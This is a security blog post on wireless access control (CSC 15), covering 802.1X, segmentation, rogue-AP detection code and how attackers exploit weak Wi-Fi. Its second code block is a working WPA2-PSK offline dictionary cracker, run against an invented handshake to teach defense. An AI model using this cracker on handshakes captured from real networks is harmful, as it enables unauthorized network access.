Breaking Down The Critical Security Controls: CSC 15 – Wireless Access Control
Your network is a collection of wall ports, switches, routers, firewalls and miles of cable tying it all together. At least it used to be. In the ‘old’ days the only way to get a physical device onto the local network was to take a cable and plug in, which meant you had to be on premises and near a live port. Those days are over in the world of wireless. As companies become more internally mobile, with conference room gatherings of 20 people, it is not feasible to have 20 cables lying around for everyone to plug into. Since people no longer want to take meeting notes on paper, the laptop or tablet has become business critical.
To meet this demand, wireless access is now the norm. It also introduces a new security challenge: you no longer directly control where people can ‘plug in’. Wireless reaches anywhere in range, including outside your offices and into the public world beyond them. That calls for new practices around access to your wireless access points, and that is what CSC 15 covers: Wireless Access Control.
Here’s what the control says –
The processes and tools used to track, control, prevent and correct the security use of wireless local area networks (LANs), access points and wireless client systems.
The control is fairly straight forward. Control your access.
There are many ways to reduce and control access to the wireless network. The best approach is layered; none of the steps below is sufficient on its own.
- Do not broadcast the SSID of your access points. Treat this as hygiene rather than a control: clients still disclose the SSID in probe and association frames, so anyone with a sniffer recovers it in minutes. It only stops the most casual discovery.
- In your corporate builds (see CSC 3) configure the wireless connection profile and manage it administratively. Don’t allow users to create or modify wireless connections by hand.
- Use certificate-based authentication (802.1X with EAP-TLS): no valid certificate, no access. Provided the client profile is also set to validate the RADIUS server’s certificate, this removes the threat of a false access point set up with the same name, because the impostor cannot present a certificate the client trusts.
- Use strong authentication. Don’t use a simple, static WPA2 passphrase shared by everyone: it is captured once, cracked offline, and cannot be revoked for one person without changing it for all. Authenticate against the directory with each user’s own account (802.1X/RADIUS) so you decide who can connect and can sever access instantly by disabling the account.
- Limit transmit power. Some access points are very powerful; walk outside your building(s) and see how far away you can still connect, then reduce the power until coverage ends as close to the facility as you can get it.
- Segment the wireless network from the rest of the network. Do not allow vendors, visitors or personal devices onto the corporate wireless. Put them on an isolated, bandwidth-limited network that has no access to any critical area.
- Review, monitor, analyze. Know who and what is connecting, and watch the wireless alongside the rest of your network: unknown access points advertising your SSID, unknown client MACs and off-hours connections are the things to look for.
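The monitoring step and the rogue-access-point concern above are easiest to act on with a plain comparison between what your radios hear and what you own. The following is an added example, not code from the original post: it parses a constructed site-survey export (BSSID, SSID, security, channel, RSSI, the shape most survey and wardriving tools can emit) and checks it against a constructed inventory of authorized access points. It flags an unknown BSSID advertising a corporate SSID (an evil twin) and an authorized BSSID advertising different security than it should (a misconfiguration, or an attacker cloning the BSSID). The survey rows, inventory, SSIDs and BSSIDs are all invented for the example.

```python
import csv
import io

# Constructed site-survey export (invented data): one row per beacon a survey
# radio heard, in the CSV shape most survey and wardriving tools can emit.
SCAN_CSV = """\
bssid,ssid,security,channel,rssi
aa:bb:cc:00:00:01,CorpWiFi,WPA2-EAP,36,-48
aa:bb:cc:00:00:02,CorpWiFi,WPA2-EAP,44,-61
aa:bb:cc:00:00:03,CorpGuest,WPA2-PSK,1,-55
aa:bb:cc:00:00:04,CorpWiFi,WPA2-PSK,149,-52
de:ad:be:ef:00:01,CorpWiFi,WPA2-PSK,6,-40
de:ad:be:ef:00:02,CorpWiFi,OPEN,11,-70
ff:ee:dd:00:00:09,CafeFree,OPEN,1,-80
"""

# Constructed inventory of the access points the organization owns:
# BSSID -> (SSID it is supposed to advertise, key management it must use).
AUTHORIZED_APS = {
    "aa:bb:cc:00:00:01": ("CorpWiFi", "WPA2-EAP"),
    "aa:bb:cc:00:00:02": ("CorpWiFi", "WPA2-EAP"),
    "aa:bb:cc:00:00:03": ("CorpGuest", "WPA2-PSK"),
    "aa:bb:cc:00:00:04": ("CorpWiFi", "WPA2-EAP"),
}


def parse_scan(text):
    """Parse the CSV export into a list of dicts with normalized BSSID and security."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        rows.append({
            "bssid": row["bssid"].strip().lower(),
            "ssid": row["ssid"].strip(),
            "security": row["security"].strip().upper(),
            "channel": int(row["channel"]),
            "rssi": int(row["rssi"]),
        })
    return rows


def audit_scan(text, authorized):
    """Compare every beacon seen against the authorized inventory.

    Returns a list of findings, each a dict with the offending bssid, ssid,
    an 'issue' tag and a human-readable detail string.
    """
    corporate_ssids = {ssid for ssid, _ in authorized.values()}
    findings = []
    for ap in parse_scan(text):
        expected = authorized.get(ap["bssid"])
        if expected is None:
            # A radio we do not own. Only interesting if it impersonates one of
            # our SSIDs; the neighbor's cafe network is none of our business.
            if ap["ssid"] in corporate_ssids:
                findings.append({
                    "bssid": ap["bssid"], "ssid": ap["ssid"], "issue": "evil-twin",
                    "detail": f"unknown BSSID advertising corporate SSID with "
                              f"{ap['security']} on channel {ap['channel']} (RSSI {ap['rssi']})",
                })
            continue
        exp_ssid, exp_security = expected
        if ap["ssid"] != exp_ssid:
            findings.append({
                "bssid": ap["bssid"], "ssid": ap["ssid"], "issue": "ssid-mismatch",
                "detail": f"authorized AP should advertise {exp_ssid!r}",
            })
        if ap["security"] != exp_security:
            # Either someone reconfigured our AP down to a weaker mode, or an
            # attacker cloned our BSSID: both deserve a visit to that location.
            findings.append({
                "bssid": ap["bssid"], "ssid": ap["ssid"], "issue": "security-mismatch",
                "detail": f"expected {exp_security}, beacon says {ap['security']}",
            })
    return findings


if __name__ == "__main__":
    for f in audit_scan(SCAN_CSV, AUTHORIZED_APS):
        print(f"{f['issue']:<18} {f['bssid']}  {f['ssid']:<10} {f['detail']}")
```

Run it against a fresh survey on a schedule and alert on any finding. Note its limit: an attacker who clones both the BSSID and the security mode of a real access point is invisible to a beacon comparison, which is exactly why the client-side server-certificate validation in the list above matters; the impostor can look identical in the air but cannot complete the authentication.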
How It Could Be Exploited
The simplest exploitation is a guy sitting in a car in your parking lot capturing your wireless traffic. Hacking 101 teaches attackers to look for and exploit poor wireless security. On a pre-shared-key network it takes a few minutes to capture what is needed (the four-way handshake between an access point and any client), and the rest of the cracking can be done elsewhere, offline, to recover your key. Most hacking isn’t busting through walls; it is finding legitimate accounts and access codes and walking in directly with them. Poor or weak security on the access point is all they need. Once on the network they can get to work.
Unlike an external-facing application, which is typically isolated and limited in what it can reach, a breach of the wireless access point can give a criminal access to everything they can ping. Unless you have strong authentication and monitoring in place, someone could drop off a Raspberry Pi for a day or two, connected to your network, and bang away at every IP and port looking for vulnerabilities, missing patches and exploits, reporting back to a command-and-control server.
This is a very common method. It is also why you should never connect to coffee shop WiFi without a VPN to protect your traffic, and even then a rogue access point sitting in the middle can intercept your connection before the VPN tunnel is up.
Wireless access is convenient and a common, if not mandatory, piece of network equipment. Its protection deserves a step up in focus over the rest of your network, because you never know where someone is connecting from. There are no cables to follow.
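To make concrete what “capture a few minutes of traffic and crack it elsewhere” means for a WPA2 pre-shared-key network, here is an added example that is not from the original post. It implements the WPA2-Personal key derivation from IEEE 802.11i (PMK from PBKDF2-HMAC-SHA1 over the passphrase and SSID, PTK from the PRF over both MAC addresses and both nonces, and the HMAC-SHA1-128 key MIC on handshake message 2) and then runs a wordlist against a constructed handshake. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all invented for the example, and the “sniffed” MIC is computed with the same functions so the block runs offline. Everything the attacker needs (SSID, two MACs, two nonces, one MIC’d frame) is visible in the air, nothing further from the access point is needed once it is recorded, and only passphrase entropy stands between the capture and the key.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal pairwise master key: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the SSID, 4096 iterations, 256 bits. This is the only slow step
    and it is per candidate, so wordlist size x 4096 HMACs is the attacker's cost."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i)
    for i = 0..3 and keep the first 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key. Inputs are sorted so both sides compute the same
    value; the first 16 bytes are the KCK used to MIC the EAPOL-Key frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC for WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the whole
    EAPOL-Key frame with its MIC field set to zero, truncated to 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(capture: dict, wordlist):
    """Offline dictionary attack: derive PMK -> PTK -> MIC for each candidate and
    compare with the MIC sniffed in message 2. Returns the passphrase or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return candidate
    return None


def constructed_capture(real_passphrase: str) -> dict:
    """Stand-in for a sniffed four-way handshake (invented values, not a real capture).
    Message 2 is rebuilt with its MIC field zeroed, exactly as cracking tools do; the
    'sniffed' MIC is computed here from the real passphrase so the example is
    self-contained."""
    ssid = "CorpWiFi"
    ap_mac = bytes.fromhex("aabbcc000001")
    sta_mac = bytes.fromhex("112233445566")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    eapol = (
        bytes.fromhex("02030075")          # EAPOL: version 2, type 3 (Key), body length 117
        + bytes.fromhex("02010a0000")      # RSN descriptor, key info 0x010a (v2, pairwise, MIC), key length 0
        + (1).to_bytes(8, "big")           # replay counter
        + snonce                           # key nonce (the supplicant's)
        + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID (all zero in message 2)
        + bytes(16)                        # MIC field, zeroed for the MIC computation
        + bytes.fromhex("0016")            # key data length 22
        + bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE (CCMP/PSK)
    )
    assert len(eapol) == 4 + 0x75
    kck = derive_ptk(pmk_from_passphrase(real_passphrase, ssid),
                     ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


# Constructed wordlist; the weak corporate passphrase is in it, as weak ones tend to be.
WORDLIST = ["password", "letmein", "CorpWiFi123", "Summer2016!", "welcome1"]

if __name__ == "__main__":
    cap = constructed_capture("Summer2016!")
    print("recovered:", crack_psk(cap, WORDLIST))
```

The defensive reading of this block is the point: every user of a PSK network shares one secret that is exposed to exactly this attack by anyone who records one handshake, and the 4096 PBKDF2 iterations only slow the guessing, they do not stop it when the passphrase is in a list. Per-user 802.1X credentials or EAP-TLS certificates remove the shared secret altogether, which is why the list above prefers them.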
End of Line.
Binary Blogger has spent 20 years in the Information Security space, currently providing security solutions and evangelism to clients. From early web application programming, system administration and senior management to enterprise consulting, I provide practical security analysis and solutions to help companies and individuals figure out HOW to be secure every day.